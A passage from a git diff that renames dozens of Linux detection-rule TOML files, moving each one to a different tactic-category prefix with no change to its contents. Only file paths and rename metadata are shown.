=> defense_evasion_kernel_driver_load_by_non_root.toml} (100%) rename rules/linux/{persistence_kernel_module_load_from_unusual_location.toml => defense_evasion_kernel_module_load_from_unusual_location.toml} (100%) rename rules/linux/{persistence_kworker_file_creation.toml => defense_evasion_kworker_file_creation.toml} (100%) rename rules/linux/{privilege_escalation_kworker_uid_elevation.toml => defense_evasion_kworker_uid_elevation.toml} (100%) rename rules/linux/{command_and_control_linux_kworker_netcon.toml => defense_evasion_linux_kworker_netcon.toml} (100%) rename rules/linux/{privilege_escalation_load_and_unload_of_kernel_via_kexec.toml => defense_evasion_load_and_unload_of_kernel_via_kexec.toml} (100%) rename rules/linux/{execution_netcon_from_rwx_mem_region_binary.toml => defense_evasion_netcon_from_rwx_mem_region_binary.toml} (100%) rename rules/linux/{execution_process_backgrounded_by_unusual_parent.toml => defense_evasion_process_backgrounded_by_unusual_parent.toml} (100%) rename rules/linux/{execution_process_started_from_process_id_file.toml => defense_evasion_process_started_from_process_id_file.toml} (100%) rename rules/linux/{execution_process_started_in_shared_memory_directory.toml => defense_evasion_process_started_in_shared_memory_directory.toml} (100%) rename rules/linux/{privilege_escalation_sda_disk_mount_non_root.toml => defense_evasion_sda_disk_mount_non_root.toml} (100%) rename rules/linux/{persistence_shared_object_creation.toml => defense_evasion_shared_object_creation.toml} (100%) rename rules/linux/{execution_shell_evasion_linux_binary.toml => defense_evasion_shell_evasion_linux_binary.toml} (100%) rename rules/linux/{execution_sus_extraction_or_decrompression_via_funzip.toml => defense_evasion_sus_extraction_or_decrompression_via_funzip.toml} (100%) rename rules/linux/{privilege_escalation_suspicious_chown_fowner_elevation.toml => defense_evasion_suspicious_chown_fowner_elevation.toml} (100%) rename rules/linux/{execution_system_binary_file_permission_change.toml => defense_evasion_system_binary_file_permission_change.toml} (100%) rename rules/linux/{execution_tc_bpf_filter.toml => defense_evasion_tc_bpf_filter.toml} (100%) rename rules/linux/{execution_unusual_kthreadd_execution.toml => defense_evasion_unusual_kthreadd_execution.toml} (100%) rename rules/linux/{persistence_unusual_pam_grantor.toml => defense_evasion_unusual_pam_grantor.toml} (100%) rename rules/linux/{execution_unusual_path_invocation_from_command_line.toml => defense_evasion_unusual_path_invocation_from_command_line.toml} (100%) rename rules/linux/{discovery_virtual_machine_fingerprinting.toml => defense_evasion_virtual_machine_fingerprinting.toml} (100%) rename rules/linux/{execution_shell_via_meterpreter_linux.toml => discovery_shell_via_meterpreter_linux.toml} (100%) rename rules/linux/{execution_suspicious_executable_running_system_commands.toml => discovery_suspicious_executable_running_system_commands.toml} (100%) rename rules/linux/{persistence_apt_package_manager_execution.toml => execution_apt_package_manager_execution.toml} (100%) rename rules/linux/{persistence_apt_package_manager_netcon.toml => execution_apt_package_manager_netcon.toml} (100%) rename rules/linux/{persistence_at_job_creation.toml => execution_at_job_creation.toml} (100%) rename rules/linux/{persistence_cron_job_creation.toml => execution_cron_job_creation.toml} (100%) rename rules/linux/{command_and_control_cupsd_foomatic_rip_netcon.toml => execution_cupsd_foomatic_rip_netcon.toml} (100%) rename rules/linux/{persistence_dbus_unsual_daemon_parent_execution.toml => execution_dbus_unsual_daemon_parent_execution.toml} (100%) rename rules/linux/{persistence_git_hook_execution.toml => execution_git_hook_execution.toml} (100%) rename rules/linux/{persistence_git_hook_process_execution.toml => execution_git_hook_process_execution.toml} (100%) rename rules/linux/{defense_evasion_interactive_shell_from_system_user.toml => execution_interactive_shell_from_system_user.toml} (100%) rename rules/linux/{privilege_escalation_potential_wildcard_shell_spawn.toml => execution_potential_wildcard_shell_spawn.toml} (100%) rename rules/linux/{persistence_suspicious_ssh_execution_xzbackdoor.toml => execution_suspicious_ssh_execution_xzbackdoor.toml} (100%) rename rules/linux/{persistence_systemd_service_started.toml => execution_systemd_service_started.toml} (100%) rename rules/linux/{persistence_systemd_shell_execution.toml => execution_systemd_shell_execution.toml} (100%) rename rules/linux/{persistence_unusual_exim4_child_process.toml => execution_unusual_exim4_child_process.toml} (100%) rename rules/linux/{persistence_web_server_sus_child_spawned.toml => execution_web_server_sus_child_spawned.toml} (100%) rename rules/linux/{persistence_web_server_sus_command_execution.toml => execution_web_server_sus_command_execution.toml} (100%) rename rules/linux/{persistence_web_server_unusual_command_execution.toml => execution_web_server_unusual_command_execution.toml} (100%) rename rules/linux/{defense_evasion_authorized_keys_file_deletion.toml => impact_authorized_keys_file_deletion.toml} (100%) rename rules/linux/{defense_evasion_rename_esxi_files.toml => impact_rename_esxi_files.toml} (100%) rename rules/linux/{execution_suspicious_mining_process_creation_events.toml => impact_suspicious_mining_process_creation_events.toml} (100%) rename rules/linux/{defense_evasion_user_or_group_deletion.toml => impact_user_or_group_deletion.toml} (100%) rename rules/linux/{persistence_linux_shell_activity_via_web_server.toml => initial_access_linux_shell_activity_via_web_server.toml} (100%) rename rules/linux/{privilege_escalation_potential_bufferoverflow_attack.toml => initial_access_potential_bufferoverflow_attack.toml} (100%) rename rules/linux/{persistence_ssh_via_backdoored_system_user.toml => initial_access_ssh_via_backdoored_system_user.toml} (100%) rename rules/linux/{persistence_unusual_sshd_child_process.toml => lateral_movement_unusual_sshd_child_process.toml} (100%) rename rules/linux/{privilege_escalation_ld_preload_shared_object_modif.toml => persistence_ld_preload_shared_object_modif.toml} (100%) rename rules/linux/{defense_evasion_ld_so_creation.toml => persistence_ld_so_creation.toml} (100%) rename rules/linux/{privilege_escalation_linux_suspicious_symbolic_link.toml => persistence_linux_suspicious_symbolic_link.toml} (100%) rename rules/linux/{privilege_escalation_sudo_hijacking.toml => persistence_sudo_hijacking.toml} (100%) rename rules/linux/{privilege_escalation_suspicious_passwd_file_write.toml => persistence_suspicious_passwd_file_write.toml} (100%) rename rules/linux/{persistence_process_capability_set_via_setcap.toml => privilege_escalation_process_capability_set_via_setcap.toml} (100%) rename rules/linux/{persistence_setuid_setgid_capability_set.toml => privilege_escalation_setuid_setgid_capability_set.toml} (100%) rename rules/linux/{execution_unusual_pkexec_execution.toml => privilege_escalation_unusual_pkexec_execution.toml} (100%) diff --git a/rules/linux/credential_access_gdb_process_hooking.toml b/rules/linux/collection_gdb_process_hooking.toml similarity index 100% rename from rules/linux/credential_access_gdb_process_hooking.toml rename to rules/linux/collection_gdb_process_hooking.toml diff --git a/rules/linux/exfiltration_potential_database_dumping.toml b/rules/linux/collection_potential_database_dumping.toml similarity index 100% rename from rules/linux/exfiltration_potential_database_dumping.toml rename to rules/linux/collection_potential_database_dumping.toml diff --git a/rules/linux/credential_access_collection_sensitive_files.toml b/rules/linux/collection_sensitive_files.toml similarity index 100% rename from rules/linux/credential_access_collection_sensitive_files.toml rename to rules/linux/collection_sensitive_files.toml diff --git a/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml b/rules/linux/collection_sensitive_files_compression_inside_container.toml similarity index 100% rename from rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml rename to rules/linux/collection_sensitive_files_compression_inside_container.toml diff --git a/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml b/rules/linux/command_and_control_cupsd_foomatic_rip_suspicious_child_execution.toml similarity index 100% rename from rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml rename to rules/linux/command_and_control_cupsd_foomatic_rip_suspicious_child_execution.toml diff --git a/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml b/rules/linux/command_and_control_curl_or_wget_executed_via_lolbin.toml similarity index 100% rename from rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml rename to rules/linux/command_and_control_curl_or_wget_executed_via_lolbin.toml diff --git a/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml b/rules/linux/command_and_control_egress_connection_from_entrypoint_in_container.toml similarity index 100% rename from rules/linux/execution_egress_connection_from_entrypoint_in_container.toml rename to rules/linux/command_and_control_egress_connection_from_entrypoint_in_container.toml diff --git a/rules/linux/execution_file_execution_followed_by_deletion.toml b/rules/linux/command_and_control_file_execution_followed_by_deletion.toml similarity index 100% rename from rules/linux/execution_file_execution_followed_by_deletion.toml rename to rules/linux/command_and_control_file_execution_followed_by_deletion.toml diff --git a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml b/rules/linux/command_and_control_file_transfer_or_listener_established_via_netcat.toml similarity index 100% rename from rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml rename to rules/linux/command_and_control_file_transfer_or_listener_established_via_netcat.toml diff --git a/rules/linux/persistence_git_hook_netcon.toml b/rules/linux/command_and_control_git_hook_netcon.toml similarity index 100% rename from rules/linux/persistence_git_hook_netcon.toml rename to rules/linux/command_and_control_git_hook_netcon.toml diff --git a/rules/linux/execution_nc_listener_via_rlwrap.toml b/rules/linux/command_and_control_nc_listener_via_rlwrap.toml similarity index 100% rename from rules/linux/execution_nc_listener_via_rlwrap.toml rename to rules/linux/command_and_control_nc_listener_via_rlwrap.toml diff --git a/rules/linux/execution_network_event_post_compilation.toml b/rules/linux/command_and_control_network_event_post_compilation.toml similarity index 100% rename from rules/linux/execution_network_event_post_compilation.toml rename to rules/linux/command_and_control_network_event_post_compilation.toml diff --git a/rules/linux/persistence_pluggable_authentication_module_source_download.toml b/rules/linux/command_and_control_pluggable_authentication_module_source_download.toml similarity index 100% rename from rules/linux/persistence_pluggable_authentication_module_source_download.toml rename to rules/linux/command_and_control_pluggable_authentication_module_source_download.toml diff --git a/rules/linux/execution_shell_openssl_client_or_server.toml b/rules/linux/command_and_control_shell_openssl_client_or_server.toml similarity index 100% rename from rules/linux/execution_shell_openssl_client_or_server.toml rename to rules/linux/command_and_control_shell_openssl_client_or_server.toml diff --git a/rules/linux/execution_shell_via_background_process.toml b/rules/linux/command_and_control_shell_via_background_process.toml similarity index 100% rename from rules/linux/execution_shell_via_background_process.toml rename to rules/linux/command_and_control_shell_via_background_process.toml diff --git a/rules/linux/execution_shell_via_child_tcp_utility_linux.toml b/rules/linux/command_and_control_shell_via_child_tcp_utility_linux.toml similarity index 100% rename from rules/linux/execution_shell_via_child_tcp_utility_linux.toml rename to rules/linux/command_and_control_shell_via_child_tcp_utility_linux.toml diff --git a/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml b/rules/linux/command_and_control_shell_via_lolbin_interpreter_linux.toml similarity index 100% rename from rules/linux/execution_shell_via_lolbin_interpreter_linux.toml rename to rules/linux/command_and_control_shell_via_lolbin_interpreter_linux.toml diff --git a/rules/linux/execution_shell_via_suspicious_binary.toml b/rules/linux/command_and_control_shell_via_suspicious_binary.toml similarity index 100% rename from rules/linux/execution_shell_via_suspicious_binary.toml rename to rules/linux/command_and_control_shell_via_suspicious_binary.toml diff --git a/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml b/rules/linux/command_and_control_shell_via_tcp_cli_utility_linux.toml similarity index 100% rename from rules/linux/execution_shell_via_tcp_cli_utility_linux.toml rename to rules/linux/command_and_control_shell_via_tcp_cli_utility_linux.toml diff --git a/rules/linux/execution_shell_via_udp_cli_utility_linux.toml b/rules/linux/command_and_control_shell_via_udp_cli_utility_linux.toml similarity index 100% rename from rules/linux/execution_shell_via_udp_cli_utility_linux.toml rename to rules/linux/command_and_control_shell_via_udp_cli_utility_linux.toml diff --git a/rules/linux/persistence_simple_web_server_connection_accepted.toml b/rules/linux/command_and_control_simple_web_server_connection_accepted.toml similarity index 100% rename from rules/linux/persistence_simple_web_server_connection_accepted.toml rename to rules/linux/command_and_control_simple_web_server_connection_accepted.toml diff --git a/rules/linux/lateral_movement_ssh_it_worm_download.toml b/rules/linux/command_and_control_ssh_it_worm_download.toml similarity index 100% rename from rules/linux/lateral_movement_ssh_it_worm_download.toml rename to rules/linux/command_and_control_ssh_it_worm_download.toml diff --git a/rules/linux/persistence_systemd_netcon.toml b/rules/linux/command_and_control_systemd_netcon.toml similarity index 100% rename from rules/linux/persistence_systemd_netcon.toml rename to rules/linux/command_and_control_systemd_netcon.toml diff --git a/rules/linux/lateral_movement_telnet_network_activity_external.toml b/rules/linux/command_and_control_telnet_network_activity_external.toml similarity index 100% rename from rules/linux/lateral_movement_telnet_network_activity_external.toml rename to rules/linux/command_and_control_telnet_network_activity_external.toml diff --git a/rules/linux/persistence_web_server_sus_destination_port.toml b/rules/linux/command_and_control_web_server_sus_destination_port.toml similarity index 100% rename from rules/linux/persistence_web_server_sus_destination_port.toml rename to rules/linux/command_and_control_web_server_sus_destination_port.toml diff --git a/rules/linux/privilege_escalation_dac_permissions.toml b/rules/linux/credential_access_dac_permissions.toml similarity index 100% rename from rules/linux/privilege_escalation_dac_permissions.toml rename to rules/linux/credential_access_dac_permissions.toml diff --git a/rules/linux/lateral_movement_kubeconfig_file_activity.toml b/rules/linux/credential_access_kubeconfig_file_activity.toml similarity index 100% rename from rules/linux/lateral_movement_kubeconfig_file_activity.toml rename to rules/linux/credential_access_kubeconfig_file_activity.toml diff --git a/rules/linux/discovery_kubeconfig_file_discovery.toml b/rules/linux/credential_access_kubeconfig_file_discovery.toml similarity index 100% rename from rules/linux/discovery_kubeconfig_file_discovery.toml rename to rules/linux/credential_access_kubeconfig_file_discovery.toml diff --git a/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml b/rules/linux/credential_access_kubernetes_direct_api_request_via_curl_or_wget.toml similarity index 100% rename from rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml rename to rules/linux/credential_access_kubernetes_direct_api_request_via_curl_or_wget.toml diff --git a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml b/rules/linux/credential_access_modify_ssh_binaries.toml similarity index 100% rename from rules/linux/persistence_credential_access_modify_ssh_binaries.toml rename to rules/linux/credential_access_modify_ssh_binaries.toml diff --git a/rules/linux/persistence_pluggable_authentication_module_creation.toml b/rules/linux/credential_access_pluggable_authentication_module_creation.toml similarity index 100% rename from rules/linux/persistence_pluggable_authentication_module_creation.toml rename to rules/linux/credential_access_pluggable_authentication_module_creation.toml diff --git a/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml b/rules/linux/credential_access_pluggable_authentication_module_creation_in_unusual_dir.toml similarity index 100% rename from rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml rename to rules/linux/credential_access_pluggable_authentication_module_creation_in_unusual_dir.toml diff --git a/rules/linux/impact_potential_bruteforce_malware_infection.toml b/rules/linux/credential_access_potential_bruteforce_malware_infection.toml similarity index 100% rename from rules/linux/impact_potential_bruteforce_malware_infection.toml rename to rules/linux/credential_access_potential_bruteforce_malware_infection.toml diff --git a/rules/linux/execution_potential_hack_tool_executed.toml b/rules/linux/credential_access_potential_hack_tool_executed.toml similarity index 100% rename from rules/linux/execution_potential_hack_tool_executed.toml rename to rules/linux/credential_access_potential_hack_tool_executed.toml diff --git a/rules/linux/discovery_private_key_password_searching_activity.toml b/rules/linux/credential_access_private_key_password_searching_activity.toml similarity index 100% rename from rules/linux/discovery_private_key_password_searching_activity.toml rename to rules/linux/credential_access_private_key_password_searching_activity.toml diff --git a/rules/linux/discovery_security_file_access_via_common_utility.toml b/rules/linux/credential_access_security_file_access_via_common_utility.toml similarity index 100% rename from rules/linux/discovery_security_file_access_via_common_utility.toml rename to rules/linux/credential_access_security_file_access_via_common_utility.toml diff --git a/rules/linux/privilege_escalation_shadow_file_read.toml b/rules/linux/credential_access_shadow_file_read.toml similarity index 100% rename from rules/linux/privilege_escalation_shadow_file_read.toml rename to rules/linux/credential_access_shadow_file_read.toml diff --git a/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml b/rules/linux/credential_access_suspicious_network_tool_launched_inside_container.toml similarity index 100% rename from rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml rename to rules/linux/credential_access_suspicious_network_tool_launched_inside_container.toml diff --git a/rules/linux/execution_abnormal_process_id_file_created.toml b/rules/linux/defense_evasion_abnormal_process_id_file_created.toml similarity index 100% rename from rules/linux/execution_abnormal_process_id_file_created.toml rename to rules/linux/defense_evasion_abnormal_process_id_file_created.toml diff --git a/rules/linux/persistence_boot_file_copy.toml b/rules/linux/defense_evasion_boot_file_copy.toml similarity index 100% rename from rules/linux/persistence_boot_file_copy.toml rename to rules/linux/defense_evasion_boot_file_copy.toml diff --git a/rules/linux/persistence_bpf_probe_write_user.toml b/rules/linux/defense_evasion_bpf_probe_write_user.toml similarity index 100% rename from rules/linux/persistence_bpf_probe_write_user.toml rename to rules/linux/defense_evasion_bpf_probe_write_user.toml diff --git a/rules/linux/persistence_bpf_program_or_map_load.toml b/rules/linux/defense_evasion_bpf_program_or_map_load.toml similarity index 100% rename from rules/linux/persistence_bpf_program_or_map_load.toml rename to rules/linux/defense_evasion_bpf_program_or_map_load.toml diff --git a/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml b/rules/linux/defense_evasion_chown_chmod_unauthorized_file_read.toml similarity index 100% rename from rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml rename to rules/linux/defense_evasion_chown_chmod_unauthorized_file_read.toml diff --git a/rules/linux/execution_file_made_executable_via_chmod_inside_container.toml b/rules/linux/defense_evasion_file_made_executable_via_chmod_inside_container.toml similarity index 100% rename from rules/linux/execution_file_made_executable_via_chmod_inside_container.toml rename to rules/linux/defense_evasion_file_made_executable_via_chmod_inside_container.toml diff --git a/rules/linux/persistence_insmod_kernel_module_load.toml b/rules/linux/defense_evasion_insmod_kernel_module_load.toml similarity index 100% rename from rules/linux/persistence_insmod_kernel_module_load.toml rename to rules/linux/defense_evasion_insmod_kernel_module_load.toml diff --git a/rules/linux/persistence_kernel_driver_load.toml b/rules/linux/defense_evasion_kernel_driver_load.toml similarity index 100% rename from rules/linux/persistence_kernel_driver_load.toml rename to rules/linux/defense_evasion_kernel_driver_load.toml diff --git a/rules/linux/persistence_kernel_driver_load_by_non_root.toml b/rules/linux/defense_evasion_kernel_driver_load_by_non_root.toml similarity index 100% rename from rules/linux/persistence_kernel_driver_load_by_non_root.toml rename to rules/linux/defense_evasion_kernel_driver_load_by_non_root.toml diff --git a/rules/linux/persistence_kernel_module_load_from_unusual_location.toml b/rules/linux/defense_evasion_kernel_module_load_from_unusual_location.toml similarity index 100% rename from rules/linux/persistence_kernel_module_load_from_unusual_location.toml rename to rules/linux/defense_evasion_kernel_module_load_from_unusual_location.toml diff --git a/rules/linux/persistence_kworker_file_creation.toml b/rules/linux/defense_evasion_kworker_file_creation.toml similarity index 100% rename from rules/linux/persistence_kworker_file_creation.toml rename to rules/linux/defense_evasion_kworker_file_creation.toml diff --git a/rules/linux/privilege_escalation_kworker_uid_elevation.toml b/rules/linux/defense_evasion_kworker_uid_elevation.toml similarity index 100% rename from rules/linux/privilege_escalation_kworker_uid_elevation.toml rename to rules/linux/defense_evasion_kworker_uid_elevation.toml diff --git a/rules/linux/command_and_control_linux_kworker_netcon.toml b/rules/linux/defense_evasion_linux_kworker_netcon.toml similarity index 100% rename from rules/linux/command_and_control_linux_kworker_netcon.toml rename to rules/linux/defense_evasion_linux_kworker_netcon.toml diff --git a/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml b/rules/linux/defense_evasion_load_and_unload_of_kernel_via_kexec.toml similarity index 100% rename from rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml rename to rules/linux/defense_evasion_load_and_unload_of_kernel_via_kexec.toml diff --git a/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml b/rules/linux/defense_evasion_netcon_from_rwx_mem_region_binary.toml similarity index 100% rename from rules/linux/execution_netcon_from_rwx_mem_region_binary.toml rename to rules/linux/defense_evasion_netcon_from_rwx_mem_region_binary.toml diff --git a/rules/linux/execution_process_backgrounded_by_unusual_parent.toml b/rules/linux/defense_evasion_process_backgrounded_by_unusual_parent.toml similarity index 100% rename from rules/linux/execution_process_backgrounded_by_unusual_parent.toml rename to rules/linux/defense_evasion_process_backgrounded_by_unusual_parent.toml diff --git a/rules/linux/execution_process_started_from_process_id_file.toml b/rules/linux/defense_evasion_process_started_from_process_id_file.toml similarity index 100% rename from rules/linux/execution_process_started_from_process_id_file.toml rename to rules/linux/defense_evasion_process_started_from_process_id_file.toml diff --git a/rules/linux/execution_process_started_in_shared_memory_directory.toml b/rules/linux/defense_evasion_process_started_in_shared_memory_directory.toml similarity index 100% rename from rules/linux/execution_process_started_in_shared_memory_directory.toml rename to rules/linux/defense_evasion_process_started_in_shared_memory_directory.toml diff --git a/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml b/rules/linux/defense_evasion_sda_disk_mount_non_root.toml similarity index 100% rename from rules/linux/privilege_escalation_sda_disk_mount_non_root.toml rename to rules/linux/defense_evasion_sda_disk_mount_non_root.toml diff --git a/rules/linux/persistence_shared_object_creation.toml b/rules/linux/defense_evasion_shared_object_creation.toml similarity index 100% rename from rules/linux/persistence_shared_object_creation.toml rename to rules/linux/defense_evasion_shared_object_creation.toml diff --git a/rules/linux/execution_shell_evasion_linux_binary.toml b/rules/linux/defense_evasion_shell_evasion_linux_binary.toml similarity index 100% rename from rules/linux/execution_shell_evasion_linux_binary.toml rename to rules/linux/defense_evasion_shell_evasion_linux_binary.toml diff --git a/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml b/rules/linux/defense_evasion_sus_extraction_or_decrompression_via_funzip.toml similarity index 100% rename from rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml rename to rules/linux/defense_evasion_sus_extraction_or_decrompression_via_funzip.toml diff --git a/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml b/rules/linux/defense_evasion_suspicious_chown_fowner_elevation.toml similarity index 100% rename from rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml rename to rules/linux/defense_evasion_suspicious_chown_fowner_elevation.toml diff --git a/rules/linux/execution_system_binary_file_permission_change.toml b/rules/linux/defense_evasion_system_binary_file_permission_change.toml similarity index 100% rename from rules/linux/execution_system_binary_file_permission_change.toml rename to rules/linux/defense_evasion_system_binary_file_permission_change.toml diff --git a/rules/linux/execution_tc_bpf_filter.toml b/rules/linux/defense_evasion_tc_bpf_filter.toml similarity index 100% rename from rules/linux/execution_tc_bpf_filter.toml rename to rules/linux/defense_evasion_tc_bpf_filter.toml diff --git a/rules/linux/execution_unusual_kthreadd_execution.toml b/rules/linux/defense_evasion_unusual_kthreadd_execution.toml similarity index 100% rename from rules/linux/execution_unusual_kthreadd_execution.toml rename to rules/linux/defense_evasion_unusual_kthreadd_execution.toml diff --git a/rules/linux/persistence_unusual_pam_grantor.toml b/rules/linux/defense_evasion_unusual_pam_grantor.toml similarity index 100% rename from rules/linux/persistence_unusual_pam_grantor.toml rename to rules/linux/defense_evasion_unusual_pam_grantor.toml diff --git a/rules/linux/execution_unusual_path_invocation_from_command_line.toml b/rules/linux/defense_evasion_unusual_path_invocation_from_command_line.toml similarity index 100% rename from rules/linux/execution_unusual_path_invocation_from_command_line.toml rename to rules/linux/defense_evasion_unusual_path_invocation_from_command_line.toml diff --git a/rules/linux/discovery_virtual_machine_fingerprinting.toml b/rules/linux/defense_evasion_virtual_machine_fingerprinting.toml similarity index 100% rename from rules/linux/discovery_virtual_machine_fingerprinting.toml rename to rules/linux/defense_evasion_virtual_machine_fingerprinting.toml diff --git a/rules/linux/execution_shell_via_meterpreter_linux.toml b/rules/linux/discovery_shell_via_meterpreter_linux.toml similarity index 100% rename from rules/linux/execution_shell_via_meterpreter_linux.toml rename to rules/linux/discovery_shell_via_meterpreter_linux.toml diff --git a/rules/linux/execution_suspicious_executable_running_system_commands.toml b/rules/linux/discovery_suspicious_executable_running_system_commands.toml similarity index 100% rename from rules/linux/execution_suspicious_executable_running_system_commands.toml rename to rules/linux/discovery_suspicious_executable_running_system_commands.toml diff --git a/rules/linux/persistence_apt_package_manager_execution.toml b/rules/linux/execution_apt_package_manager_execution.toml similarity index 100% rename from rules/linux/persistence_apt_package_manager_execution.toml rename to rules/linux/execution_apt_package_manager_execution.toml diff --git a/rules/linux/persistence_apt_package_manager_netcon.toml b/rules/linux/execution_apt_package_manager_netcon.toml similarity index 100% rename from rules/linux/persistence_apt_package_manager_netcon.toml rename to rules/linux/execution_apt_package_manager_netcon.toml diff --git a/rules/linux/persistence_at_job_creation.toml b/rules/linux/execution_at_job_creation.toml similarity index 100% rename from rules/linux/persistence_at_job_creation.toml rename to rules/linux/execution_at_job_creation.toml diff --git a/rules/linux/persistence_cron_job_creation.toml b/rules/linux/execution_cron_job_creation.toml similarity index 100% rename from rules/linux/persistence_cron_job_creation.toml rename to rules/linux/execution_cron_job_creation.toml diff --git a/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml b/rules/linux/execution_cupsd_foomatic_rip_netcon.toml similarity index 100% rename from rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml rename to rules/linux/execution_cupsd_foomatic_rip_netcon.toml diff --git a/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml b/rules/linux/execution_dbus_unsual_daemon_parent_execution.toml similarity index 100% rename from rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml rename to rules/linux/execution_dbus_unsual_daemon_parent_execution.toml diff --git a/rules/linux/persistence_git_hook_execution.toml b/rules/linux/execution_git_hook_execution.toml similarity index 100% rename from rules/linux/persistence_git_hook_execution.toml rename to rules/linux/execution_git_hook_execution.toml diff --git a/rules/linux/persistence_git_hook_process_execution.toml b/rules/linux/execution_git_hook_process_execution.toml similarity index 100% rename from rules/linux/persistence_git_hook_process_execution.toml rename to rules/linux/execution_git_hook_process_execution.toml diff --git a/rules/linux/defense_evasion_interactive_shell_from_system_user.toml b/rules/linux/execution_interactive_shell_from_system_user.toml similarity index 100% rename from rules/linux/defense_evasion_interactive_shell_from_system_user.toml rename to rules/linux/execution_interactive_shell_from_system_user.toml diff --git a/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml b/rules/linux/execution_potential_wildcard_shell_spawn.toml similarity index 100% rename from rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml rename to rules/linux/execution_potential_wildcard_shell_spawn.toml diff --git a/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml b/rules/linux/execution_suspicious_ssh_execution_xzbackdoor.toml similarity index 100% rename from rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml rename to rules/linux/execution_suspicious_ssh_execution_xzbackdoor.toml diff --git a/rules/linux/persistence_systemd_service_started.toml b/rules/linux/execution_systemd_service_started.toml similarity index 100% rename from rules/linux/persistence_systemd_service_started.toml rename to rules/linux/execution_systemd_service_started.toml diff --git a/rules/linux/persistence_systemd_shell_execution.toml b/rules/linux/execution_systemd_shell_execution.toml similarity index 100% rename from rules/linux/persistence_systemd_shell_execution.toml rename to rules/linux/execution_systemd_shell_execution.toml diff --git a/rules/linux/persistence_unusual_exim4_child_process.toml b/rules/linux/execution_unusual_exim4_child_process.toml similarity index 100% rename from rules/linux/persistence_unusual_exim4_child_process.toml rename to rules/linux/execution_unusual_exim4_child_process.toml diff --git a/rules/linux/persistence_web_server_sus_child_spawned.toml b/rules/linux/execution_web_server_sus_child_spawned.toml similarity index 100% rename from rules/linux/persistence_web_server_sus_child_spawned.toml rename to rules/linux/execution_web_server_sus_child_spawned.toml diff --git a/rules/linux/persistence_web_server_sus_command_execution.toml b/rules/linux/execution_web_server_sus_command_execution.toml similarity index 100% rename from rules/linux/persistence_web_server_sus_command_execution.toml rename to rules/linux/execution_web_server_sus_command_execution.toml diff --git a/rules/linux/persistence_web_server_unusual_command_execution.toml b/rules/linux/execution_web_server_unusual_command_execution.toml similarity index 100% rename from rules/linux/persistence_web_server_unusual_command_execution.toml rename to rules/linux/execution_web_server_unusual_command_execution.toml diff --git a/rules/linux/defense_evasion_authorized_keys_file_deletion.toml b/rules/linux/impact_authorized_keys_file_deletion.toml similarity index 100% rename from rules/linux/defense_evasion_authorized_keys_file_deletion.toml rename to rules/linux/impact_authorized_keys_file_deletion.toml diff --git a/rules/linux/defense_evasion_rename_esxi_files.toml b/rules/linux/impact_rename_esxi_files.toml similarity index 100% rename from rules/linux/defense_evasion_rename_esxi_files.toml rename to rules/linux/impact_rename_esxi_files.toml diff --git a/rules/linux/execution_suspicious_mining_process_creation_events.toml b/rules/linux/impact_suspicious_mining_process_creation_events.toml similarity index 100% rename from rules/linux/execution_suspicious_mining_process_creation_events.toml rename to rules/linux/impact_suspicious_mining_process_creation_events.toml diff --git a/rules/linux/defense_evasion_user_or_group_deletion.toml b/rules/linux/impact_user_or_group_deletion.toml similarity index 100% rename from rules/linux/defense_evasion_user_or_group_deletion.toml rename to rules/linux/impact_user_or_group_deletion.toml diff --git a/rules/linux/persistence_linux_shell_activity_via_web_server.toml b/rules/linux/initial_access_linux_shell_activity_via_web_server.toml similarity index 100% rename from rules/linux/persistence_linux_shell_activity_via_web_server.toml rename to rules/linux/initial_access_linux_shell_activity_via_web_server.toml diff --git a/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml b/rules/linux/initial_access_potential_bufferoverflow_attack.toml similarity index 100% rename from rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml rename to rules/linux/initial_access_potential_bufferoverflow_attack.toml diff --git a/rules/linux/persistence_ssh_via_backdoored_system_user.toml b/rules/linux/initial_access_ssh_via_backdoored_system_user.toml similarity index 100% rename from rules/linux/persistence_ssh_via_backdoored_system_user.toml rename to rules/linux/initial_access_ssh_via_backdoored_system_user.toml diff --git a/rules/linux/persistence_unusual_sshd_child_process.toml b/rules/linux/lateral_movement_unusual_sshd_child_process.toml similarity index 100% rename from rules/linux/persistence_unusual_sshd_child_process.toml rename to rules/linux/lateral_movement_unusual_sshd_child_process.toml diff --git a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml b/rules/linux/persistence_ld_preload_shared_object_modif.toml similarity index 100% rename from rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml rename to 